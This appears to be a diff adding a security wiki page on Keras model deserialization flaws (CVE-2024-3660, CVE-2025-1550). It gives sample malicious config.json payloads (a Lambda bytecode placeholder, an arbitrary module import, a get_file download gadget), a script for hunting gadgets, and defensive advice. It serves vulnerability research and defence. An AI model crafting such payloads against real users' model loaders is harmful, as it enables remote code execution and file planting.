| 1 | +# Keras Model Deserialization RCE and Gadget Hunting |
| 2 | + |
| 3 | +{{#include ../../banners/hacktricks-training.md}} |
| 4 | + |
| 5 | +This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets. |
| 6 | + |
| 7 | +## .keras model format internals |
| 8 | + |
| 9 | +A .keras file is a ZIP archive containing at least: |
| 10 | +- metadata.json – generic info (e.g., Keras version) |
| 11 | +- config.json – model architecture (primary attack surface) |
| 12 | +- model.weights.h5 – weights in HDF5 |
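Because the container is a plain ZIP, it can be inspected without importing Keras at all. The following is a minimal sketch using only the standard library; the in-memory archive and its contents are hypothetical stand-ins for a real model, and the helper names (`list_members`, `read_config`, `iter_objects`) are illustrative.

```python
import io
import json
import zipfile


def list_members(archive):
    """Return the member names of a .keras (ZIP) archive."""
    with zipfile.ZipFile(archive) as zf:
        return zf.namelist()


def read_config(archive):
    """Parse config.json without invoking any Keras deserialization code."""
    with zipfile.ZipFile(archive) as zf:
        return json.loads(zf.read("config.json"))


def iter_objects(node):
    """Yield (module, class_name) for every serialized object in a config tree."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node.get("module"), node["class_name"]
        for value in node.values():
            yield from iter_objects(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_objects(item)


# Hypothetical stand-in archive built in memory (no real weights).
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as zf:
    zf.writestr("metadata.json", json.dumps({"keras_version": "3.x"}))
    zf.writestr("config.json", json.dumps({
        "module": "keras.layers",
        "class_name": "Dense",
        "config": {
            "units": 64,
            "activation": {"module": "keras.activations", "class_name": "relu"},
        },
    }))

print(list_members(demo))
print(sorted(iter_objects(read_config(demo))))
```

Listing the `(module, class_name)` pairs this way gives a quick view of what a loader would be asked to import and resolve, before any of it runs.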
| 13 | + |
| 14 | +The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries. |
| 15 | + |
| 16 | +Example snippet for a Dense layer object: |
| 17 | + |
| 18 | +```json |
| 19 | +{ |
| 20 | + "module": "keras.layers", |
| 21 | + "class_name": "Dense", |
| 22 | + "config": { |
| 23 | + "units": 64, |
| 24 | + "activation": { |
| 25 | + "module": "keras.activations", |
| 26 | + "class_name": "relu" |
| 27 | + }, |
| 28 | + "kernel_initializer": { |
| 29 | + "module": "keras.initializers", |
| 30 | + "class_name": "GlorotUniform" |
| 31 | + } |
| 32 | + } |
| 33 | +} |
| 34 | +``` |
| 35 | + |
| 36 | +Deserialization performs: |
| 37 | +- Module import and symbol resolution from module/class_name keys |
| 38 | +- from_config(...) or constructor invocation with attacker-controlled kwargs |
| 39 | +- Recursion into nested objects (activations, initializers, constraints, etc.) |
| 40 | + |
| 41 | +Historically, this exposed three primitives to an attacker crafting config.json: |
| 42 | +- Control of what modules are imported |
| 43 | +- Control of which classes/functions are resolved |
| 44 | +- Control of kwargs passed into constructors/from_config |
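To make the three primitives concrete, here is a toy config-driven deserializer. It is an illustrative stand-in, not Keras code: `toy_deserialize` is a hypothetical name, and the demo resolves harmless standard-library classes only.

```python
import importlib


def toy_deserialize(node):
    """Illustrative config-driven deserializer (NOT the Keras implementation)."""
    if isinstance(node, list):
        return [toy_deserialize(item) for item in node]
    if not (isinstance(node, dict) and "class_name" in node):
        return node  # plain value, returned unchanged

    # Primitive 1: the config chooses which module gets imported.
    module = importlib.import_module(node["module"])
    # Primitive 2: the config chooses which symbol is resolved.
    target = getattr(module, node["class_name"])
    # Primitive 3: the config supplies the kwargs, recursing into nested objects.
    kwargs = {k: toy_deserialize(v) for k, v in node.get("config", {}).items()}
    return target(**kwargs)


cfg = {
    "module": "types",
    "class_name": "SimpleNamespace",
    "config": {
        "label": "demo",
        "ratio": {
            "module": "fractions",
            "class_name": "Fraction",
            "config": {"numerator": 3, "denominator": 4},
        },
    },
}

obj = toy_deserialize(cfg)
print(obj.label, obj.ratio)
```

Every step is steered by data in the dictionary, which is why an unrestricted version of this pattern is dangerous when the dictionary comes from an untrusted file.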
| 45 | + |
| 46 | +## CVE-2024-3660 – Lambda-layer bytecode RCE |
| 47 | + |
| 48 | +Root cause: |
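| 49 | +- Lambda.from_config() used python_utils.func_load(...), which base64-decodes attacker bytes and passes them to marshal.loads(). The result is an attacker-chosen code object that Keras wraps in a function, so the attacker's bytecode runs as soon as the Lambda layer is called. |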
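The underlying mechanism can be reproduced with the standard library alone. This sketch round-trips a harmless function through `marshal` and base64 and rebuilds it with `types.FunctionType`. The helper names are hypothetical, and this only approximates what a bytecode-based loader does. Note that marshal data is specific to the Python version that produced it.

```python
import base64
import marshal
import types


def pack_function(fn):
    """Serialize a function's code object as base64-encoded marshal data."""
    return base64.b64encode(marshal.dumps(fn.__code__)).decode("ascii")


def unpack_function(blob):
    """Rebuild a callable from base64 + marshal data. Unsafe on untrusted input."""
    code = marshal.loads(base64.b64decode(blob))
    # Whoever controls `blob` controls the bytecode that this function will run.
    return types.FunctionType(code, {})


blob = pack_function(lambda x: x * 2 + 1)  # harmless stand-in payload
revived = unpack_function(blob)
print(revived(20))  # -> 41
```

Nothing in the decoding path validates what the bytecode does, so the only safe option for untrusted input is not to rebuild it at all.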
| 50 | + |
| 51 | +Exploit idea (simplified payload in config.json): |
| 52 | + |
| 53 | +```json |
| 54 | +{ |
| 55 | + "module": "keras.layers", |
| 56 | + "class_name": "Lambda", |
| 57 | + "config": { |
| 58 | + "name": "exploit_lambda", |
| 59 | + "function": { |
| 60 | + "function_type": "lambda", |
| 61 | + "bytecode_b64": "<attacker_base64_marshal_payload>" |
| 62 | + } |
| 63 | + } |
| 64 | +} |
| 65 | +``` |
| 66 | + |
| 67 | +Mitigation: |
| 68 | +- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False. |
| 69 | + |
| 70 | +Notes: |
| 71 | +- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders. |
| 72 | + |
| 73 | +## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8 |
| 74 | + |
| 75 | +Root cause: |
| 76 | +- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json. |
| 77 | +- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs. |
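The "import-time code runs" step is easy to demonstrate in isolation. The sketch below plants a hypothetical module (`maliciouspkg_demo`, written to a temporary directory) whose top-level statement creates a marker file, then resolves it from a config-like dictionary. It models the general pattern only and does not call Keras.

```python
import importlib
import os
import sys
import tempfile

workdir = tempfile.mkdtemp()
marker = os.path.join(workdir, "import_ran.txt")

# Hypothetical attacker-planted module: its top-level statement runs on import.
with open(os.path.join(workdir, "maliciouspkg_demo.py"), "w") as fh:
    fh.write(
        f"open({marker!r}, 'w').write('executed at import time')\n"
        "class Danger:\n"
        "    def __init__(self, arg=None):\n"
        "        self.arg = arg\n"
    )

sys.path.insert(0, workdir)
importlib.invalidate_caches()

cfg = {"module": "maliciouspkg_demo", "class_name": "Danger", "config": {"arg": "val"}}

module = importlib.import_module(cfg["module"])  # side effect fires here
obj = getattr(module, cfg["class_name"])(**cfg["config"])  # then attacker kwargs
print(os.path.exists(marker), obj.arg)
```

The marker file exists before the class is ever instantiated, which is why restricting the importable modules matters independently of any later type checks.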
| 78 | + |
| 79 | +Exploit idea: |
| 80 | + |
| 81 | +```json |
| 82 | +{ |
| 83 | + "module": "maliciouspkg", |
| 84 | + "class_name": "Danger", |
| 85 | + "config": {"arg": "val"} |
| 86 | +} |
| 87 | +``` |
| 88 | + |
| 89 | +Security improvements (Keras ≥ 3.9): |
| 90 | +- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp |
| 91 | +- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading |
| 92 | +- Basic type checking: deserialized objects must match expected types |
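When reviewing or reimplementing an allowlist like this, one detail worth testing is how the module string is matched. The sketch below contrasts a prefix test with a comparison on the top-level package name. Both functions are hypothetical illustrations and make no claim about how Keras implements its check.

```python
ALLOWED_ROOTS = {"keras", "keras_hub", "keras_cv", "keras_nlp"}


def naive_is_allowed(module_path):
    """Flawed: a prefix test also accepts look-alike package names."""
    return any(module_path.startswith(root) for root in ALLOWED_ROOTS)


def is_allowed(module_path):
    """Compare only the top-level package name against the allowlist."""
    return module_path.split(".", 1)[0] in ALLOWED_ROOTS


for candidate in ["keras.layers", "keras_hub.models", "keras_evil.payload", "os"]:
    print(candidate, naive_is_allowed(candidate), is_allowed(candidate))
```

A package named `keras_evil` passes the prefix test but fails the root comparison, so probing a loader with look-alike names is a cheap regression test.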
| 93 | + |
| 94 | +## Post-fix gadget surface inside allowlist |
| 95 | + |
| 96 | +Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. |
| 97 | + |
| 98 | +Gadget via Lambda that references an allowed function (not serialized Python bytecode): |
| 99 | + |
| 100 | +```json |
| 101 | +{ |
| 102 | + "module": "keras.layers", |
| 103 | + "class_name": "Lambda", |
| 104 | + "config": { |
| 105 | + "name": "dl", |
| 106 | + "function": {"module": "keras.utils", "class_name": "get_file"}, |
| 107 | + "arguments": { |
| 108 | + "fname": "artifact.bin", |
| 109 | + "origin": "https://example.com/artifact.bin", |
| 110 | + "cache_dir": "/tmp/keras-cache" |
| 111 | + } |
| 112 | + } |
| 113 | +} |
| 114 | +``` |
| 115 | + |
| 116 | +Important limitation: |
| 117 | +- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. |
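This constraint can be pre-screened with `inspect.signature(...).bind(...)`, which reports whether a call would bind without actually executing the target. The sketch below is an assumption-laden helper: `tolerates_extra_positional` and the three sample functions are hypothetical, and a placeholder object stands in for the input tensor.

```python
import inspect


def tolerates_extra_positional(func, kwargs):
    """True if func(<tensor>, **kwargs) would bind without raising TypeError."""
    try:
        inspect.signature(func).bind(object(), **kwargs)
    except (TypeError, ValueError):
        # TypeError: arguments do not fit; ValueError: no introspectable signature.
        return False
    return True


# Hypothetical candidate callables with different signatures.
def fetch(target, origin=None):
    return target, origin


def strict(*, origin):
    return origin


def flexible(*args, **kwargs):
    return args, kwargs


print(tolerates_extra_positional(fetch, {"origin": "u"}))
print(tolerates_extra_positional(fetch, {"target": "x"}))
print(tolerates_extra_positional(strict, {"origin": "u"}))
print(tolerates_extra_positional(flexible, {"origin": "u"}))
```

Note the second case: supplying the first parameter by keyword collides with the prepended positional argument, so the chosen kwargs matter as much as the function's signature.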
| 118 | + |
| 119 | +Potential impacts of allowlisted gadgets: |
| 120 | +- Arbitrary download/write (path planting, config poisoning) |
| 121 | +- Network callbacks/SSRF-like effects depending on environment |
| 122 | +- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists |
| 123 | + |
| 124 | +## Researcher toolkit |
| 125 | + |
| 126 | +1) Systematic gadget discovery in allowed modules |
| 127 | + |
| 128 | +Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. |
| 129 | + |
| 130 | +```python |
| 131 | +import importlib, inspect, pkgutil |
| 132 | + |
| 133 | +ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"] |
| 134 | + |
| 135 | +seen = set() |
| 136 | + |
| 137 | +def iter_modules(mod): |
| 138 | +    if not hasattr(mod, "__path__"): |
| 139 | +        return |
| 140 | +    for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + ".", onerror=lambda _: None):  # skip packages that fail to import |
| 141 | +        yield m.name |
| 142 | + |
| 143 | +candidates = [] |
| 144 | +for root in ALLOWLIST: |
| 145 | +    try: |
| 146 | +        r = importlib.import_module(root) |
| 147 | +    except Exception: |
| 148 | +        continue |
| 149 | +    for name in iter_modules(r): |
| 150 | +        if name in seen: |
| 151 | +            continue |
| 152 | +        seen.add(name) |
| 153 | +        try: |
| 154 | +            m = importlib.import_module(name) |
| 155 | +        except Exception: |
| 156 | +            continue |
| 157 | +        for n, obj in inspect.getmembers(m): |
| 158 | +            if inspect.isfunction(obj) or inspect.isclass(obj): |
| 159 | +                sig = "" |
| 160 | +                try: |
| 161 | +                    sig = str(inspect.signature(obj)) |
| 162 | +                except Exception: |
| 163 | +                    pass |
| 164 | +                doc = (inspect.getdoc(obj) or "").lower() |
| 165 | +                text = f"{name}.{n}{sig} :: {doc.splitlines()[0] if doc else ''}"  # first docstring line keeps output readable |
| 166 | +                # Heuristics: look for I/O or network-ish hints |
| 167 | +                if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]): |
| 168 | +                    candidates.append(text) |
| 169 | + |
| 170 | +print("\n".join(sorted(candidates)[:200])) |
| 171 | +``` |
| 172 | + |
| 173 | +2) Direct deserialization testing (no .keras archive needed) |
| 174 | + |
| 175 | +Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. |
| 176 | + |
| 177 | +```python |
| 178 | +from keras import saving |
| 179 | + |
| 180 | +cfg = { |
| 181 | +    "module": "keras.layers", |
| 182 | +    "class_name": "Lambda", |
| 183 | +    "config": { |
| 184 | +        "name": "probe", |
| 185 | +        "function": {"module": "keras.utils", "class_name": "get_file"}, |
| 186 | +        "arguments": {"fname": "x", "origin": "https://example.com/x"} |
| 187 | +    } |
| 188 | +} |
| 189 | + |
| 190 | +layer = saving.deserialize_keras_object(cfg, safe_mode=True)  # accepts safe_mode explicitly; observe behavior |
| 191 | +``` |
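To "observe side effects" more systematically, one option is a Python audit hook (`sys.addaudithook`, available since Python 3.8) that records file, network, and process events raised while a probe runs. This is a sketch under stated assumptions: the watched event list is a selection rather than an exhaustive set, `observe` is a hypothetical helper, and the demo action just opens a temporary file instead of calling Keras.

```python
import os
import sys
import tempfile

WATCHED = ("open", "socket.connect", "subprocess.Popen", "urllib.Request", "os.system")
events = []
state = {"recording": False}


def _hook(event, args):
    # Audit hooks cannot be removed once added, so gate recording on a flag.
    if state["recording"] and event in WATCHED:
        events.append((event, repr(args[:1])))


sys.addaudithook(_hook)


def observe(action):
    """Run action() and return the watched audit events it triggered."""
    events.clear()
    state["recording"] = True
    try:
        action()
    finally:
        state["recording"] = False
    return list(events)


# Stand-in action: a real probe would wrap the deserialization call instead.
probe_path = os.path.join(tempfile.mkdtemp(), "probe.txt")


def probe():
    with open(probe_path, "w") as fh:
        fh.write("x")


for event, detail in observe(probe):
    print(event, detail)
```

In practice the deserialization call from the probe above would be passed to `observe(...)` inside an isolated environment, since the hook only records events and does not block them.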
| 192 | + |
| 193 | +3) Cross-version probing and formats |
| 194 | + |
| 195 | +Keras exists in multiple codebases/eras with different guardrails and formats: |
| 196 | +- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion) |
| 197 | +- tf-keras: maintained separately |
| 198 | +- Multi-backend Keras 3 (official): introduced native .keras |
| 199 | + |
| 200 | +Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. |
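When testing across formats, it helps to classify a file by its content, not its extension, because a renamed file may be routed to a different loader. The sketch below checks the HDF5 signature at offset 0 and falls back to `zipfile.is_zipfile`. The function name and labels are hypothetical, and HDF5 files whose superblock is not at offset 0 would be reported as unknown.

```python
import io
import zipfile

HDF5_MAGIC = b"\x89HDF\r\n\x1a\n"  # HDF5 format signature


def sniff_model_format(fh):
    """Classify a binary file object as 'hdf5', 'keras-zip', or 'unknown'."""
    fh.seek(0)
    head = fh.read(len(HDF5_MAGIC))
    fh.seek(0)
    if head == HDF5_MAGIC:
        return "hdf5"
    if zipfile.is_zipfile(fh):
        return "keras-zip"
    return "unknown"


# Hypothetical in-memory samples standing in for real model files.
zip_sample = io.BytesIO()
with zipfile.ZipFile(zip_sample, "w") as zf:
    zf.writestr("config.json", "{}")

hdf5_sample = io.BytesIO(HDF5_MAGIC + b"\x00" * 8)
other_sample = io.BytesIO(b"not a model")

for sample in (zip_sample, hdf5_sample, other_sample):
    print(sniff_model_format(sample))
```

For files on disk, the same function can be called as `sniff_model_format(open(path, "rb"))` inside a `with` block.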
| 201 | + |
| 202 | +## Defensive recommendations |
| 203 | + |
| 204 | +- Treat model files as untrusted input. Only load models from trusted sources. |
| 205 | +- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. |
| 206 | +- Do not set safe_mode=False when loading models unless you fully trust the file. |
| 207 | +- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. |
| 208 | +- Enforce allowlists/signatures for model sources and integrity checking where possible. |
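As one way to apply the integrity-checking recommendation, a loader can refuse any model file whose SHA-256 digest does not match a value pinned out of band. This is a minimal sketch using only the standard library. `verify_model` is a hypothetical helper, and how the expected digest is distributed and trusted is outside its scope.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_of(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_model(path, expected_hex):
    """Return path if it matches the pinned digest, otherwise raise ValueError."""
    actual = sha256_of(path)
    if not hmac.compare_digest(actual, expected_hex.lower()):
        raise ValueError(f"digest mismatch for {path}: got {actual}")
    return path


# Demo with a stand-in file; a real pin would come from a trusted channel.
model_path = os.path.join(tempfile.mkdtemp(), "model.keras")
with open(model_path, "wb") as fh:
    fh.write(b"model-bytes")

pinned = hashlib.sha256(b"model-bytes").hexdigest()
print(verify_model(model_path, pinned) == model_path)
```

A digest check only proves the file is the one that was pinned. It does not make a malicious model safe, so it complements sandboxing but does not replace it.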
| 209 | + |
| 210 | +## References |
| 211 | + |
| 212 | +- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) |
| 213 | +- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751) |
| 214 | +- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660) |
| 215 | +- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) |
| 216 | +- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) |
| 217 | +- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) |
| 218 | + |
| 219 | +{{#include ../../banners/hacktricks-training.md}} |